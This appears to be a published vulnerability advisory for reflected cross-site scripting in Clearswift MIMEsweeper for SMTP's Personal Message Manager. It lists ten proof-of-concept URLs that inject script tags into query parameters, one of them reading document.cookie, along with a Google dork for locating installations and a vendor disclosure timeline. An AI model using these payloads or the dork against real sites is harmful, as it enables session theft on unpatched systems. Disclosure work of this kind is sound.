Home / exploits MIMEsweeper For SMTP 5.5 Cross Site Scripting
Posted on 19 February 2013
Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM) Vendor: Clearswift Ltd Vendor URL: http://www.clearswift.com/ Category: Reflective XSS Google dork: inurl:/MSWPMM/ Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com] [Vulnerability Reproduction] 1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script> 2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script> 3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script> 4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script> 5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script> 6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script> 9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script> [Time-line] 17/07/2009 - Initial discovery 13/01/2012 - Notified vendor 13/01/2012 - Vendor responded 16/01/2012 - Vendor requested more information 16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate 16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too 17/01/2012 - Telephone conversation with vendor in regards the findings 17/01/2012 - Assigned vulnerability reference MSW-1459 25/01/2012 - Requested status update 25/01/2012 - Vendor replied "There is no update on MSW-1459." 16/02/2012 - Requested status update 26/02/2012 - Vendor replied "There is no update on MSW-1459." 23/03/2012 - Requested status update 23/03/2012 - Vendor replied "There is no update on MSW-1459." 09/05/2012 - Requested status update and gave a notice for public disclosure 11/05/2012 - Vendor replied "There is no update on MSW-1459." 18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team 07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release 07/06/2012 - Requested due to date for next release 12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012 13/06/2012 - We suggested to postpone the disclosure after the patch be public 06/12/2012 - Requested status update 06/12/2012 - Vendor sent details for patch 28/01/2013 - Patch is applicable for 5.5.1 09/02/2012 - We requested for demo license to verify fix 15/02/2013 - Vendor could not produce demo license for us to verify the fix 15/02/2013 - Vendor closes incident ticket 18/02/2013 - Public disclosure date
